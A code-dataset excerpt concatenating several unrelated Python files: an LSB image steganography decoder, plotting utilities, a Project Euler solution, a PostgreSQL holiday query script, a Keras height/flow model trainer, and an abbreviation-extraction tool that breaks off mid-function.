red_bits = binary_to_string(complete_pixel[0:8])\r\n green_bits = binary_to_string(complete_pixel[8:16])\r\n blue_bits = binary_to_string(complete_pixel[16:])\r\n\r\n #RGB bits converted to decimal\r\n red_value = int(red_bits, 2)\r\n green_value = int(green_bits, 2)\r\n blue_value = int(blue_bits, 2)\r\n \r\n # finally RGB transferred into pixel format\r\n decoded_pixel = (red_value, green_value, blue_value)\r\n # empty our pixel list\r\n complete_pixel = []\r\n \r\n complete_line.append(decoded_pixel)\r\n # when we have enough pixels to make up a line, we add it to the image\r\n if len(complete_line)== secret_width:\r\n complete_image.append(complete_line)\r\n complete_line = []\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n \r\n # converts our array of pixels to an image that we can display\r\n array = np.array(complete_image, dtype = np.uint8)\r\n decoded_image = Image.fromarray(array)\r\n decoded_image.save(copyLocation)\r\n \r\n #spike.display_image()\r\n\r\n\r\n\r\n\"\"\"\r\nConverts a binary list into a string\r\n@param: binary_list a list of binary numbers\r\n@return: the binary_list in string form\r\n\"\"\"\r\ndef binary_to_string(binary_list):\r\n binary_string = \"\"\r\n for item in binary_list:\r\n binary_string += str(item)\r\n return binary_string\r\n\r\n\r\n\"\"\"\r\nFunction that writes the key to decode an image's secret text data.\r\n@param: cover_j the last j pixel used in the cover image\r\n@param: cover_i the last i pixel used in the cover image\r\n@param: max_lsb_used the highest lsb used in the cover image\r\n\"\"\"\r\ndef write_text_key(cover_j, cover_i, max_lsb_used):\r\n key_text = str(cover_j) + \", \" + str(cover_i) + \", \" + str(max_lsb_used)\r\n key = open(\"key.txt\", \"w\")\r\n key.write(key_text)\r\n \r\n key.close()\r\n #tells the user where the key was written to\r\n pid = subprocess.Popen([sys.executable, \"KeyWindow.py\"])\r\n\r\n\r\n\"\"\"\r\nFunction that writes the key to decode an image's secret image data\r\n@param: cover_j the last j pixel used in the cover image\r\n@param: cover_i the last i pixel used in the cover image\r\n@param: secret_width the width of the encoded image\r\n@param: max_lsb_used the highest lsb used in the cover image\r\n\"\"\"\r\ndef write_key(cover_j, cover_i, secret_width, max_lsb_used):\r\n key_text = str(cover_j) + \", \" + str(cover_i) + \", \" + str(secret_width) + \", \" + str(max_lsb_used)\r\n key = open(\"key.txt\", \"w\")\r\n key.write(key_text)\r\n \r\n key.close()\r\n pid = subprocess.Popen([sys.executable, \"KeyWindow.py\"])\r\n\r\n\r\n\"\"\"\r\nFunction that reads in the key and returns it as an array\r\n@param: key the path to the file that we need to read in as the key\r\n@return: the key in array form\r\n\"\"\"\r\ndef read_key(key):\r\n key = open(str(key[0]), \"r\")\r\n key_string = key.read()\r\n key_array = key_string.split(\", \")\r\n key.close()\r\n return key_array\r\n\r\n\r\n\"\"\"\r\nReturns the complete binary number of a bitlist\r\n@param: bitlist the binary number in list form\r\n@return: the binary number in decimal form\r\n\"\"\"\r\ndef getActualNum(bitlist):\r\n out = 0\r\n for bit in bitlist:\r\n out = (out << 1) | bit\r\n return out\r\n \r\n \r\n\r\n\r\n\r\n \r\n\"\"\"\r\nFunction finds the pixel coordinates of the next secret_image pixel to use\r\n@param: height the height we are currently at in the image\r\n@param: width the width we are currently at in the image\r\n@param: height_size the max height size of the image\r\n@param: width_size the max width size of the image\r\n@return: width the width we need to be on for the next pixel\r\n@return: height the height we need to be on for the next pixel\r\n@return: go if we can keep going in the cover image\r\n\"\"\"\r\ndef find_coordinates(height, width, height_size, width_size):\r\n go = True\r\n # means we are on the last pixel\r\n if width == width_size - 1 and height == height_size - 1:\r\n # since we are on the last pixel we set our go boolean to false\r\n # so the loops will stop accordingly\r\n go = False\r\n # means we are on the last pixel for this width and we need to reset \r\n elif height == height_size - 1:\r\n height = 0\r\n width += 1\r\n # otherwise, we are free to move to the next pixel to the right \r\n else:\r\n height += 1\r\n \r\n return width, height, go\r\n \r\n\r\n\"\"\"\r\nConverts a character to binary form\r\n@param: char the character to convert to binary\r\n@return: the character in binary form stored in a list\r\n\"\"\"\r\ndef char_to_binary(char):\r\n decim = ord(char)\r\n binary_char = '{0:08b}'.format(decim)\r\n return list(binary_char)\r\n \r\n# transforms a pixel to a binary string\r\n\"\"\"\r\nFunction that transforms a pixel to a binary string\r\n@param: pixel the pixel to transform to a binary string\r\n@return: a binary string in a list representing the pixel\r\n\"\"\"\r\ndef pixel_to_binary_list(pixel):\r\n # the '{}' means store the result as a string with 0 in 0:xxx as the starting\r\n # position. and x:08 meaning pad with 0's to the left out to the 8th digit\r\n # the x:xxxb means store it as a binary and format(x) formats the number\r\n # appropriately after we sum up the tuple\r\n red_px = '{0:08b}'.format(pixel[0])\r\n green_px = '{0:08b}'.format(pixel[1])\r\n blue_px = '{0:08b}'.format(pixel[2])\r\n \r\n return list(red_px + green_px + blue_px)\r\n \r\n","sub_path":"Spike/Steganography.py","file_name":"Steganography.py","file_ext":"py","file_size_in_byte":21099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166788780","text":"import os\nimport matplotlib.pyplot as plt\n\n# import seaborn as sns\n# sns.set()\nplt.style.use(\"dark_background\")\n\n\ndef plot_metrics(train_metrics, test_metrics):\n (train_loss, train_accuracy) = train_metrics\n (test_loss, test_accuracy) = test_metrics\n\n fig, axs = plt.subplots(2, 2, figsize=(12, 8))\n fig.suptitle(\"Metrics\")\n\n axs[0, 0].plot(train_loss)\n axs[0, 0].set_title(\"Training Loss\")\n\n axs[1, 0].plot(train_accuracy)\n axs[1, 0].set_title(\"Train Accuracy\")\n\n axs[0, 1].plot(test_loss)\n axs[0, 1].set_title(\"Test Loss\")\n\n axs[1, 1].plot(test_accuracy)\n axs[1, 1].set_title(\"Test Accuracy\")\n\n plt.tight_layout()\n\n plt.show()\n # plt.savefig(\"Metrics.png\")\n return plt\n\n\ndef plot_misclassified(misclassified, max_count):\n print(f\"Total Misclassified: {len(misclassified)}\")\n fig = plt.figure(fig_size=(12, 10))\n fig.suptitle(\"25 Misclassifed Images\")\n for idx, (image, prediction, target) in enumerate(misclassified[\"max_count\"]):\n image, prediction, target = image.cpu(), prediction.cpu(), target.cpu()\n ax = fig.add_subplot(5, 5, 1 + idx)\n ax.axis(\"off\")\n ax.set_title(\n f\"target {target.item()} \\nprediction {prediction.item()}\", fontsize=11\n )\n ax.imshow(image.squeeze())\n plt.show()\n","sub_path":"CIFAR10/Session1/dl_vision/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290525828","text":"from itertools import *\n\nop = [lambda x, y: x + y, lambda x, y: x - y,\n lambda x, y: x * y, lambda x, y: x / y if y != 0 else 0]\n\ndef count(n):\n s = set()\n for d1, d2, d3, d4 in permutations(n):\n for o1, o2, o3 in product(op, repeat = 3):\n for r in [o3(o2(o1(d1, d2), d3), d4), o2(o1(d1, d2), o3(d3, d4))]:\n if r == int(r):\n s.add(int(r))\n return next(filter(lambda x: x not in s, range(1, 999999)))\n\nans = max(combinations(range(10), 4), key = count)\nprint(''.join(map(str, ans)))\n","sub_path":"page02/93.py","file_name":"93.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115003287","text":"# Purpose: To connect to the PostgreSQL databse server\n\nimport psycopg2 # the psycopg2 library is used to connect to the Postgres database\nimport time # time library is used to get current date\nfrom config import config # for readibility a config file was created to read/store database connection credentials\n\ndef connect() :\n conn = None\n try:\n # get connection parameters from config function\n params = config()\n\n # connect to the PostgreSQL server\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(**params)\n\n # create a cursor from established connection\n cur = conn.cursor()\n\n # execute our queries \n # 1) Is the current date a holiday?\n curr_date = time.strftime('%Y%m%d')\n sql = \"SELECT is_holiday FROM d_date WHERE d_date_id = %s\" % (curr_date)\n cur.execute(sql)\n is_holiday = cur.fetchone()\n print('-------------------------------------------------------------------------------------')\n print('Query 1: Is the current date [' + curr_date + '] a holiday? ' + str(is_holiday[0]))\n print('-------------------------------------------------------------------------------------')\n print('')\n # 2) Return a list of (holiday) dates, which are left in the year\n print('-------------------------------------------------------------------------------------')\n print('Query 2: Return a list of holidays that remain in the year.')\n sql = \"SELECT d_date_id FROM d_date WHERE is_holiday = TRUE AND d_date_id >= %s\" % (curr_date)\n cur.execute(sql)\n remaining_holidays = [row[0] for row in cur.fetchall()]\n print(remaining_holidays)\n print('-------------------------------------------------------------------------------------')\n # close the communication w/ the Postgre server\n cur.close()\n except(Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection is closed.')\n\nif __name__ == '__main__' : connect()","sub_path":".vscode/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"80447229","text":"\"\"\"\nCopyright 2020 The Johns Hopkins University Applied Physics Laboratory LLC\nAll rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n#Approved for public release, 20-563\n\nimport sys\nsys.path.append(\"..\")\n\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nfrom glob import glob\nfrom keras.layers import Input\nfrom keras.models import load_model\nfrom keras.callbacks import TensorBoard,ModelCheckpoint\nimport json\nimport cv2\nimport multiprocessing\n\nfrom segmentation_models import UnetFlow\nfrom utilities.misc_utils import get_data,get_batch_inds,load_image,save_image,no_nan_mse,image_preprocess,load_vflow,get_checkpoint_dir\nfrom utilities.augmentation import augment,rotate_image,rotate_xydir\n\nignore_value = -10000\n\ndef train(args):\n train_data = get_data(args, is_train=True)\n val_data = get_data(args, is_train=False, rgb_paths_only=True)\n train_datagen, val_datagen, model = build_model(args, train_data, val_data)\n \n checkpoint_dir,_ = get_checkpoint_dir(args)\n \n checkpoint_filepath = os.path.join(checkpoint_dir, \"weights.{epoch:02d}.hdf5\")\n checkpoint = ModelCheckpoint(filepath=checkpoint_filepath, monitor=\"loss\", verbose=0, save_best_only=False,\n save_weights_only=False, mode=\"auto\", period=args.save_period)\n \n tensorboard = TensorBoard(log_dir=args.tensorboard_dir, write_graph=False)\n \n callbacks_list = [checkpoint, tensorboard]\n \n model.fit_generator(generator=train_datagen,\n steps_per_epoch=(len(train_data) / args.batch_size + 1),\n epochs=args.num_epochs, \n callbacks=callbacks_list)\n \ndef test(args):\n rgb_paths = get_data(args, is_train=False, rgb_paths_only=True)\n \n sub_dir = None\n if args.test_model_file is not None:\n weights_path = args.test_model_file\n else:\n checkpoint_dir,sub_dir = get_checkpoint_dir(args)\n weights_paths = glob(os.path.join(checkpoint_dir, \"*.hdf5\"))\n nums = [np.int(path.split(\".\")[-2]) for path in weights_paths]\n weights_path = weights_paths[np.argsort(nums)[-1]]\n \n model = load_model(weights_path, compile=False)\n \n predictions_dir = args.predictions_dir if sub_dir is None else os.path.join(args.predictions_dir, sub_dir)\n if not os.path.isdir(predictions_dir):\n os.makedirs(predictions_dir)\n \n \n angles = [angle for angle in range(0,360,36)] if args.test_rotations else [0]\n \n for rgb_path in tqdm(rgb_paths):\n basename = os.path.basename(rgb_path).replace(\"_RGB_\", \"_\").replace(\".tif\", \"\")\n image = load_image(rgb_path)\n \n for angle in angles:\n \n out_dir_path = os.path.join(predictions_dir, basename + \"_angle_%d_DIRPRED.json\" % angle)\n out_mag_path = os.path.join(predictions_dir, basename + \"_angle_%d_MAGPRED.tif\" % angle)\n out_agl_path = os.path.join(predictions_dir, basename + \"_angle_%d_AGLPRED.tif\" % angle)\n \n image_rotated = rotate_image(np.copy(image), None, None, angle, image_only=True)\n image_rotated = image_preprocess(image_rotated)\n pred = model.predict(np.expand_dims(image_rotated, axis=0))\n agl = None\n \n if len(pred)==2:\n xydir,mag = pred\n else:\n xydir,mag,agl = pred\n\n xydir = xydir[0,:].tolist()\n mag = mag[0,:,:,0]\n\n json.dump(xydir, open(out_dir_path, \"w\"))\n save_image(mag, out_mag_path)\n if agl is not None:\n agl = agl[0,:,:,0]\n save_image(agl, out_agl_path)\n \n \ndef get_current_metrics(item):\n vflow_gt_path,agl_gt_path,dirpred_path,magpred_path,aglpred_path, angle = item\n dir_pred = json.load(open(dirpred_path, \"r\"))\n mag_pred = load_image(magpred_path)\n agl_pred = None if not os.path.isfile(aglpred_path) else load_image(aglpred_path)\n\n agl_gt = load_image(agl_gt_path)\n \n vflow_gt,mag_gt,xdir_gt,ydir_gt,_ = load_vflow(vflow_gt_path, agl_gt)\n \n if angle != 0:\n _,mag_gt,agl_gt = rotate_image(None, mag_gt, agl_gt, angle, image_only=False)\n xdir_gt,ydir_gt = rotate_xydir(xdir_gt, ydir_gt, angle)\n\n dir_gt = np.array([xdir_gt,ydir_gt])\n dir_gt /= np.linalg.norm(dir_gt)\n \n \n vflow_gt = cv2.merge((mag_gt*dir_gt[0], mag_gt*dir_gt[1]))\n\n dir_pred /= np.linalg.norm(dir_pred)\n\n cos_ang = np.dot(dir_pred, dir_gt)\n sin_ang = np.linalg.norm(np.cross(dir_pred,dir_gt))\n rad_diff = np.arctan2(sin_ang, cos_ang)\n angle_error = np.degrees(rad_diff)\n\n vflow_pred = cv2.merge((mag_pred*dir_pred[0], mag_pred*dir_pred[1]))\n\n mag_error = np.nanmean(np.abs(mag_pred-mag_gt))\n epe = np.nanmean(np.sqrt(np.sum(np.square(vflow_gt-vflow_pred), axis=2)))\n agl_error = None if agl_pred is None else np.nanmean(np.abs(agl_pred-agl_gt))\n \n return angle_error,mag_error,epe,agl_error\n \ndef metrics(args):\n predictions_dir = args.predictions_dir \n \n _,sub_dir = get_checkpoint_dir(args)\n \n dirpred_paths = glob(os.path.join(predictions_dir, sub_dir, \"*_DIRPRED.json\"))\n \n angle_error, mag_error, epe, agl_error = [],[],[],[]\n \n items = []\n for dirpred_path in tqdm(dirpred_paths):\n magpred_path = dirpred_path.replace(\"_DIRPRED.json\", \"_MAGPRED.tif\")\n aglpred_path = dirpred_path.replace(\"_DIRPRED.json\", \"_AGLPRED.tif\")\n \n basename = os.path.basename(magpred_path)\n underscores = [ind for ind,val in enumerate(basename) if val==\"_\"]\n \n angle = np.int(basename.split(\"_\")[-2])\n \n if not args.test_rotations and angle != 0:\n continue\n \n vflow_name = basename[:underscores[2]] + \"_VFLOW\" + basename[underscores[2]:underscores[3]] + \".json\"\n agl_name = vflow_name.replace(\"_VFLOW_\", \"_AGL_\").replace(\".json\", \".tif\")\n vflow_gt_path = os.path.join(args.dataset_dir, \"test\", vflow_name)\n agl_gt_path = os.path.join(args.dataset_dir, \"test\", agl_name)\n \n items.append((vflow_gt_path,agl_gt_path,dirpred_path,magpred_path,aglpred_path,angle))\n \n if args.multiprocessing:\n pool = multiprocessing.Pool()\n results = list(tqdm(pool.imap_unordered(get_current_metrics, items), total=len(items)))\n pool.close()\n pool.join()\n else:\n results = [get_current_metrics(item) for item in tqdm(items)]\n \n for result in results:\n curr_angle_error,curr_mag_error,curr_epe,curr_agl_error = result\n angle_error.append(curr_angle_error)\n mag_error.append(curr_mag_error)\n epe.append(curr_epe)\n if curr_agl_error is not None:\n agl_error.append(curr_agl_error)\n \n mean_angle_error = np.nanmean(angle_error)\n mean_mag_error = np.nanmean(mag_error)\n mean_epe = np.nanmean(epe)\n if len(agl_error) > 0:\n mean_agl_error = np.nanmean(agl_error)\n\n fid = open(os.path.join(args.predictions_dir, \"metrics_\" + sub_dir + \".txt\"), \"w\")\n fid.write(\"Angle error: %f\" % mean_angle_error)\n fid.write(\"Mag error: %f\" % mean_mag_error)\n fid.write(\"EPE: %f\" % mean_epe)\n if len(agl_error) > 0:\n fid.write(\"AGL error: %f\" % mean_agl_error)\n fid.close()\n\n print(\"Angle error: %f\" % mean_angle_error)\n print(\"Mag error: %f\" % mean_mag_error)\n print(\"EPE: %f\" % mean_epe)\n if len(agl_error) > 0:\n print(\"AGL error: %f\" % mean_agl_error)\n \n\ndef image_generator(data, args):\n idx = np.random.permutation(len(data))\n while True:\n batch_inds = get_batch_inds(idx, args.batch_size)\n for inds in batch_inds:\n img_batch,label_batch = load_batch(inds, data, args)\n yield (img_batch, label_batch)\n \ndef load_batch(inds, data, args):\n \n xydir_batch = np.zeros((len(inds), 2))\n mag_batch = np.zeros((len(inds), args.image_size[0], args.image_size[1], 1))\n image_batch = np.zeros((len(inds), args.image_size[0], args.image_size[1], 3))\n if args.add_height:\n agl_batch = np.zeros((len(inds), args.image_size[0], args.image_size[1], 1))\n\n for batch_ind,ind in enumerate(inds):\n\n rgb_path,vflow_path,agl_path = data[ind]\n\n image = load_image(rgb_path)\n agl = load_image(agl_path)\n vflow,mag,xdir,ydir,angle_orig = load_vflow(vflow_path, agl)\n\n if args.augmentation:\n image,mag,xdir,ydir,agl = augment(image, mag, xdir, ydir, agl=agl)\n\n xydir_batch[batch_ind,0] = xdir\n xydir_batch[batch_ind,1] = ydir\n \n image_batch[batch_ind,:,:,:] = image\n mag_batch[batch_ind,:,:,0] = mag\n if args.add_height:\n agl_batch[batch_ind,:,:,0] = agl\n \n mag_batch[np.isnan(mag_batch)] = ignore_value \n gt_batch = {\"xydir\":xydir_batch, \"mag\":mag_batch}\n if args.add_height:\n agl_batch[np.isnan(agl_batch)] = ignore_value\n gt_batch[\"agl\"] = agl_batch\n \n image_batch = image_preprocess(image_batch)\n \n return image_batch, gt_batch\n\ndef build_model(args, train_data, val_data):\n \n train_datagen = image_generator(train_data, args)\n val_datagen = image_generator(val_data, args)\n\n input_tensor = Input(shape=(args.image_size[0], args.image_size[1], 3))\n input_shape = (args.image_size[0], args.image_size[1], 3)\n \n model = UnetFlow(input_shape=input_shape, input_tensor=input_tensor, \n backbone_name=args.backbone, encoder_weights=\"imagenet\", add_height=args.add_height)\n \n if args.continue_training_file is not None:\n model.load_weights(args.continue_training_file)\n\n loss = {\"xydir\":\"mse\", \"mag\":no_nan_mse}\n loss_weights = {\"xydir\": 1.0, \"mag\":1.0}\n if args.add_height:\n loss[\"agl\"] = no_nan_mse\n loss_weights[\"agl\"] = 1.0\n \n model.compile(\"Adam\", loss=loss, loss_weights=loss_weights)\n \n return train_datagen, val_datagen, model\n\n","sub_path":"utilities/ml_utils.py","file_name":"ml_utils.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450846396","text":"# \n# For discipline-specific abbreviations, store the\n# dictionary into the \"shortforms.csv\" with the\n# \"shortform - longform\" format.\n#\n\nimport csv, string, re, sqlite3, math\n\n# process dictionary\ndictPath = \"tools\\dict.csv\"\ndictReader = csv.reader(open(dictPath, 'r'), delimiter = ',')\nelements = next(dictReader)\nblacklist = next(dictReader)\nstoppers = next(dictReader)\ndoubles = next(dictReader)\n\n# process disciplines\nuniPath = \"tools\\shortforms.csv\"\nuniReader = csv.reader(open(uniPath, 'r'), delimiter = ',')\nnext(uniReader)\nuniversals = []\n\nfor row in uniReader:\n universals += [row]\n\n\ndef main():\n\n inPath = \"raw.csv\"\n outPath = \"checked.csv\"\n abbrevPath = \"abbrev.csv\"\n execute(inPath, outPath, abbrevPath)\n\ndef execute(inPath, outPath, abbrevPath):\n\n print(\"Getting abbreviations...\")\n \n grab_table_write_table(inPath, abbrevPath, \"sentences\", \"document\")\n #grab_table_write_table(inPath, abbrevPath, input(\"Sentence header?: \"), input(\"Document header?: \"))\n\n \n print(\"Done.\")\n\n print(\"Cleaning table...\")\n cleanTable(inPath, abbrevPath, outPath, \"term\", \"originals\", \"document\")\n print(\"Done.\")\n\ndef cleanTable(inPath, abbrevPath, outPath, termName, origName, docName):\n\n # file processing\n inFile = open(inPath, 'r')\n inReader = csv.reader(inFile, delimiter = \"\\t\")\n\n \n header = next(inReader)\n print(header)\n termIndex = header.index(termName)\n origIndex = header.index(origName)\n docIndex = header.index(docName)\n \n abbrevFile = open(abbrevPath, 'r')\n abbrevReader = csv.reader(abbrevFile)\n\n outFile = open(outPath, 'w')\n outWriter = csv.writer(outFile, lineterminator = \"\\n\")\n\n outWriter.writerow([\"terms\",\"original\",\"sentences\",\"document-jargon ID\", \"jargon\", \"upperform\", \"frequency\"])\n\n # find all abbreviations used for a given document\n docAbbs = dict()\n for abbRow in abbrevReader:\n if not abbRow[6] == \"Yes\":\n ID = abbRow[2]\n if ID in docAbbs:\n docAbbs[ID] += [[abbRow[0],abbRow[1], abbRow[3]]]\n else:\n docAbbs[ID] = [[abbRow[0],abbRow[1], abbRow[3]]]\n\n # fix rows and write the new row\n for inRow in inReader:\n \n docID = inRow[docIndex]\n if docID in docAbbs:\n abbrevs = docAbbs[docID]\n else:\n abbrevs = []\n\n outWriter.writerow(fixRow(inRow, abbrevs, termIndex, origIndex))\n \n\ndef fixRow(inRow, shortforms, termIndex, origIndex):\n \n term = inRow[termIndex]\n orig = inRow[origIndex]\n\n jargon = []\n upperform = term\n frequency = []\n\n # use the generated shortforms\n for sf in shortforms:\n\n abbrev = re.sub('[()]', '', sf[1])\n\n sfPresent = abbrev.lower() in term.split(\":\")\n lfPresent = sf[0].lower() in orig.lower()\n\n if sfPresent and not lfPresent:\n jargon += [[sf[0], abbrev]]\n upperform += \" \" + sf[0].lower()\n frequency += [[abbrev, sf[2]]]\n \n if lfPresent and not sfPresent:\n\n jargon += [[sf[0], abbrev]]\n upperform += \" \" + re.sub('[()]', '', sf[1]) + \" \"\n frequency += [[abbrev, sf[2]]]\n\n # use the universal shortforms\n for sf in universals:\n\n sfPresent = sf[1].lower() in term.split(\":\")\n lfPresent = sf[0].lower() in orig.lower()\n \n if sfPresent and not lfPresent:\n\n jargon += [[sf[0], sf[1]]]\n upperform += \" \" + sf[0].lower()\n\n if lfPresent and not sfPresent:\n jargon += [[sf[0], sf[1]]]\n upperform += \" \" + sf[1] + \" \"\n\n if len(jargon)>0: \n return inRow + [jargon, upperform, frequency]\n else:\n return inRow\n\n \n### OLD CODE ###\n\nclass StdevFunc:\n def __init__(self):\n self.M = 0.0\n self.S = 0.0\n self.k = 1\n\n def step(self, value):\n if value is None:\n return\n tM = self.M\n self.M += (value - tM) / self.k\n self.S += (value - tM) * (value - self.M)\n self.k += 1\n\n def finalize(self):\n if self.k < 3:\n return 0\n return math.sqrt(self.S / (self.k-2))\n\ndef _split_by_abbrevs(toSplit): # splits a string by \")\", but only if the term in parentheses matches criteria for abbreviations\n out = []\n split_indices = [0]\n index = 0\n while toSplit.find(\"(\",index) != -1:\n index = toSplit.find(\"(\",index) + 1\n endex = toSplit.find(\")\",index)\n abbreviation = toSplit[index:endex]\n # Criteria for abbreviations should go below\n if not bool(re.search(r'\\d+', abbreviation)) and 1 < len(abbreviation) < 7 and bool(re.search(\"[A-Z]\", abbreviation)) and abbreviation.lower() not in elements and not bool(re.search(\"^(IX|IV|V?I{0,3})$\", abbreviation)) and not bool(re.search(\"^[A-Z]{1}[a-z]{3,}$\", abbreviation)) and abbreviation[0] not in string.punctuation:\n split_indices.append(endex)\n split_indices.append(len(toSplit))\n for qqq in range(len(split_indices)-1):\n out.append(toSplit[split_indices[qqq] : split_indices[qqq+1]])\n return out\n\ndef _look_back(put,ID): # Pass in string delimited by \")\"\n put = str(put)\n out = []\n split_input=[]\n # split_input should contain in index 0 the abbreviation and in index 1 the string that preceeds it\n split_index = put.rfind('(',0,-2) +1\n split_input.append(put[0:split_index - 2])\n split_input.append(put[split_index: len(put)])\n if len(split_input[0]) == 0:\n return\n back = 0\n # back stores the number of words to look back, based on the abbreviation\n out.append(\" (\" + split_input[1] + \")\")\n for i in split_input[1]:\n if i not in string.punctuation and i not in string.whitespace:\n back += 1\n if bool(re.search(\".*[s]$\", split_input[1])): # Plurals often have an 's' tacked onto the end of the abbreviation proper - this accounts for that\n back -= 1\n end_index = len(split_input[0])\n if split_input[0][len(split_input[0])-1] in string.whitespace:\n end_index -= 1\n q = 0\n # This loop will look back as many words as there are characters in the abbreviation, except in special cases noted at the end\n while q < back:\n beg_index = end_index - 1\n if beg_index < 0:\n break\n while split_input[0][beg_index] not in string.whitespace and split_input[0][beg_index] != '-':\n beg_index -= 1\n if beg_index <= 0:\n break\n if split_input[0][beg_index] == '-':\n nex = split_input[0][beg_index : end_index]\n else:\n nex = split_input[0][beg_index + 1 : end_index]\n # At this point nex will have the next word stored in it\n # Below are the conditions under which nex will be added to out\n if len(nex) == 0:\n break\n if nex[len(nex) - 1] == ',' or (nex[len(nex) - 1] == '.' and len(nex) > 2) or nex.lower() in stoppers or \">\" in nex:\n break\n out.append(nex)\n if len(nex) > 14 and nex[0].lower() == split_input[1][0].lower() and not split_input[1][0] == split_input[1][len(split_input[1])-1]:\n break\n end_index = beg_index\n if nex.lower() not in blacklist: #blacklisted words don't count towards the total\n q += 1\n if nex.lower() in doubles or split_input[0][beg_index + 1 : end_index].lower() in doubles: #doubles will count twice\n q += 1\n if nex.lower() == 'x' and out[len(out)-2].lower() == '-ray':\n q -= 1\n # end while loop\n out.reverse()\n while out[0] in blacklist or out[0] in string.punctuation:\n del out[0]\n if out[0][0] in string.punctuation:\n out[0] = out[0][1:len(out[0])]\n if bool(re.search(\"^[0-9]{1,2}[\\)]{1}\", out[0])):\n out[0] = out[0].split(')' ,1)[1]\n real_out = [\"\",\"\"]\n for index in range(len(out)-1):\n real_out[0] += out[index]\n if out[index + 1][0] != '-':\n real_out[0] += \" \"\n real_out[1] = out[len(out)-1]\n letters = 0\n for maybe_letter in real_out[0]:\n if maybe_letter in string.ascii_letters:\n letters += 1\n if letters < len(real_out[0])/2:\n return\n real_out.append(ID)\n# real_out.append(put)\n real_out[0] = real_out[0].lstrip()\n if len(real_out[0]) == 0 or not real_out[0][0].lower() == real_out[1][2].lower() or real_out[0].lower() in elements:\n return\n for ab in real_out[1]:\n if ab.lower() not in real_out[0].lower() and ab.lower() in string.ascii_lowercase:\n return\n return real_out\n\n\ndef _process(input, searchIndex, IDIndex, db, tab):\n raw = []\n for readNext in input:\n entry = _split_by_abbrevs(readNext[searchIndex])\n ID = readNext[IDIndex]\n for abrev in entry:\n put = _look_back(abrev,ID)\n if put not in raw and put is not None:\n raw.append(put)\n conn = sqlite3.connect(db)\n conn.create_aggregate(\"stdev\", 1, StdevFunc)\n curse = conn.cursor()\n curse.execute(\"CREATE TABLE IF NOT EXISTS \" + tab + \"(longs TEXT, short TEXT, ID TEXT, freq INT, stdv FLOAT, avrge FLOAT, suspect TEXT)\")\n # Put raw values in SQL table\n for row in raw:\n to_insert = [row[0].lower().strip(),row[1].strip(),row[2]]\n\n curse.execute(\"INSERT INTO \"+tab+\"(longs, short, ID) VALUES (?,?,?)\", to_insert)\n # Mark suspicious entries\n curse.execute(\"SELECT DISTINCT longs, short FROM \" + tab)\n for unique in curse.fetchall():\n curse.execute(\"SELECT COUNT(longs) FROM \" + tab + \" WHERE longs = ? AND short = ?\", unique)\n freq = int(curse.fetchone()[0])\n curse.execute(\"UPDATE \" + tab + \" SET freq = ? WHERE longs = ? AND short = ?\",(freq, unique[0], unique[1]))\n check_unique = []\n check_unique.append(unique[0])\n check_unique.append(unique[1])\n to_cut = []\n for ind in range(len(check_unique[1])):\n if check_unique[1][ind] in string.ascii_lowercase or (check_unique[1][ind] in string.punctuation and not (check_unique[1][ind] == \"(\" or check_unique[1][ind] == \")\")):\n to_cut.append(ind)\n if not len(to_cut) == 0:\n replacR = check_unique[1][0:to_cut[0]]\n for bb in range(len(to_cut)-1):\n replacR += check_unique[1][to_cut[bb]+1:to_cut[bb+1]]\n if not to_cut[len(to_cut) - 1] + 1 == len(check_unique[1]):\n replacR += check_unique[1][to_cut[len(to_cut)-1]+1:len(check_unique[1])]\n check_unique[1] = replacR\n\n check_unique[0] = check_unique[0].replace(\"x-ray\",\"xray\")\n check_unique[0] = check_unique[0].replace(\"ultraviolet\",\"ultra violet\")\n spaceSplits = check_unique[0].split()\n for worb in spaceSplits:\n if worb.lower() in blacklist:\n spaceSplits.remove(worb)\n hyphenSplits = []\n for tip in spaceSplits:\n for crop in tip.split(\"-\"):\n hyphenSplits.append(crop)\n for pos in hyphenSplits:\n if len(pos) == 0:\n hyphenSplits.remove(pos)\n suspicious = \"No\"\n if not len(check_unique[1])-2 == len(hyphenSplits):\n suspicious = \"Yes\"\n else:\n try:\n for index in range(1,len(check_unique[1])-1):\n if not check_unique[1][index].lower() == hyphenSplits[index-1][0].lower():\n suspicious = \"Yes\"\n except:\n print(hyphenSplits + \" | \" + unique[1])\n\n curse.execute(\"UPDATE \" + tab + \" SET suspect = ? WHERE longs = ? AND short = ?\", (suspicious, unique[0], unique[1]))\n # Calculate standard deviation and average, write to SQL table\n curse.execute(\"SELECT DISTINCT short FROM \" + tab)\n x=curse.fetchall()\n for unique in x:\n curse.execute(\"SELECT stdev(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n #print(unique[0])\n z=curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET stdv = ? WHERE short = ?\", (z,unique[0].strip()))\n curse.execute(\"SELECT AVG(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n zz = curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET avrge = ? WHERE short = ?\", (zz,unique[0].strip()))\n curse.execute(\"SELECT DISTINCT short FROM \" + tab)\n x=curse.fetchall()\n for unique in x:\n 